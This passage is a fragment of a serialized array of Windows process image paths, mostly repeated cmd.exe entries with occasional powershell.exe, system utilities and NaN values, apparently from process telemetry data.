\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\